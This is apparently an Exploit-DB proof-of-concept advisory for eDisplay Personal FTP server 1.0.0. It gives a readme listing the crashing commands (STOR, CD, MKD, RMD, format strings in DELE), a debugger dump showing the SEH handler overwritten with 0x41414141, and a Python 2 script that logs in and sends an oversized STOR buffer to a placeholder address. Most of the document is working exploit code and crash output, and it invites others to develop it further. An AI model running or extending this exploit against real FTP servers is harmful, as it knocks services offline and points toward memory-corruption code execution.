# Title: eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC) # From: The eh?-Team || The Great White Fuzz (we're not sure yet) # Found by: loneferret # Hat's off to dookie2000ca # Disvovery date: 16/03/2010 # Software link: http://edisplay-personal-ftp-server.software.informer.com/ # Tested on: Windows XP SP3 Professional # Nod to the Exploit-DB Team
# Vendor informed via email : 17/03/2010
#THE README PART #The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below). #Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same #manner as the STOR command. #During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE) #are pretty good at crashing this application. #As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from. #Thank you.
#SEH chain of main thread #Address SE handler #0012C888 41414141
#EAX 7EFEFEFE #ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA #EDX 41414141 #EBX 0139B8D0 #ESP 0012C30C #EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAA #ESI 00000000 #EDI 0012FFFD #EIP 50E14321 FtpSer_1.50E14321 #C 0 ES 0023 32bit 0(FFFFFFFF) #P 1 CS 001B 32bit 0(FFFFFFFF) #A 0 SS 0023 32bit 0(FFFFFFFF) #Z 1 DS 0023 32bit 0(FFFFFFFF) #S 0 FS 003B 32bit 7FFDF000(FFF) #T 0 GS 0000 NULL #D 0 #O 0 LastErr ERROR_SUCCESS (00000000) #EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE) #ST0 empty %#.19L #ST1 empty %#.19L #ST2 empty +UNORM 19C4 00000000 7FFDF000 #ST3 empty -NAN FFFF 805970D5 F6B61A24 #ST4 empty -UNORM F000 0012FFA8 7FFDF6CC #ST5 empty +UNORM 0010 00000000 F6B62000 #ST6 empty 0.0 #ST7 empty 45901.499999999995440 # 3 2 1 0 E S P U O Z D I #FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0 0 0 0 (LT) #FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1
#!/usr/bin/python
import socket
buffer= "\x41" * 270
print "Fuzzing CD\r\n" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('xxx.xxx.xxx.xxx',21)) s.recv(1024) s.send('USER test\r\n') s.recv(1024) s.send('PASS test\r\n') s.recv(1024) s.send('STOR ' + buffer + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close
|